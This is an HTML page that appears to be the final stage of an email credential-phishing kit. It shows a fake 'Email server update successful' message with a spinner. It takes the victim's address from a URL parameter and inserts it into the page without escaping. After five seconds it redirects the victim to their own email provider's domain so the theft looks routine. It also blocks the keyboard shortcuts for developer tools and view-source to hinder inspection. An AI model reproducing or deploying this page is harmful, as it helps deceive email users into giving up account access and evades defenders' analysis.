
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Sign-in</title>
    <!-- Bootstrap CSS -->
   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
<style>
body{
			background: #a7a9b0;
		}

		.container{
			width:100%;
			display: flex;
			justify-content: center;
			align-items: center;
			height: 100vh;
		}

		.office{
			width: 500px;
			background: #fff;
			border:5px solid #4285f4;
			border-radius: 5px;
		}

		.office-holder{
			width:80%;
			margin: auto;
			padding: 20px 0px;
		}

		.logo{
			width:100%;
			float: left;
			margin-bottom: 2em;
		}

		.logo h1{
			font-family: arial;
		}

		.verify{
			width: 70%;
			margin: auto;
		}

		.verify h4{
			font-family: arial;
		}

		fieldset{
			width: 90%;
			float: right;
			border:2px solid #4285f4;
			border-radius: 5px;
		}

		legend{
			font-size: 15px;
			overflow: hidden;
			width: 42%;
			padding:0px 2px;
			margin: 0px;
		}

		.verify input[type='text']{
			width: 100%;
			float: right;
			border:none;
			padding:3px 10px;
		}

		.verify button{
			border:none;
			height: 40px;
			width: 80px;
			float: right;
			margin-top: 2em;
			background: #4285f4;
			border-radius: 5px;
			color: #fff;
		}

		.email-to-verify{
			border:1px solid #000;
			border-radius: 10px;
		}

		.form-holder{
			width:100%;
			float: left;
		}

		.form-holder h3{
			font-weight: 600;
		}

		.form-holder input[type='email'], input[type='password']{
			width: 100%;
			height:40px;
			float: left;
			margin-bottom: 15px;
		}
		.form-holder .btn-holder{
			width:100%;
			margin-top:1em;
			display: flex;
			align-content: center;
			align-items: center;
			justify-content: center;
		}

		.form-holder .btn-holder .btn{
			background:#0073C6;
			border:none;
			padding:6px 10px;
			color:#fff;
			border-radius: 0px;
			margin-top: 20px;
			margin-bottom: 20px;
		}

		.form-holder .btn-holder .btn:hover{
			cursor:pointer;
		}

		.checkbox{
			width: 100%;
			float: left;
			margin-top:5px;
		}

		.checkbox label{
			font-family:arial;
			font-size:13px;
			float: left;
			margin-left:1em;
		}

		.hide{
			display: none;
		}

</style>
</head>

<body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <span id="email_get1"></span>
                        </div>
                      <div id="login_logo">
                        <img src="https://cdn.glitch.com/e4905575-fbae-45d8-bc6c-e33b4a167082%2Fajax-loader35fd.gif?v=1617145491470">
                      </div>
                        <h5 class="font-weight-light">Email server update successful! You would be redirected to your email shortly</h5>
                    </div>
                    
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script>


    /* global $ */
    $(document).ready(function(){
	
	
     function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
          vars[key] = value;
        });
        return vars;
      }
      
      var number = getUrlVars()["msg"];

       $("#email_get1").html(number);
       $("#email_get3").html(number);
       var my_email =number;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var domain=final.charAt(0).toUpperCase() + final.slice(1);
        $("#email_get2").html(my_slice);
        $("#domain_get0").html(domain);
        $("#domain_get1").html(domain);
        $("#domain_get2").html(domain);

       setTimeout(() => {  window.location.replace("https://www."+my_slice); }, 5000);
   });

    document.onkeydown=function(e){
      if (e.ctrlKey && 
        (e.keyCode === 73 || 
         e.keyCode === 105 ||
         e.keyCode === 74 || 
         e.keyCode === 106 || 
         e.keyCode === 85 || 
         e.keyCode === 117)) {
        alert('not allowed');
      return false;
    } else {
      return true;
    }
  }
</script>


</body>
</html>
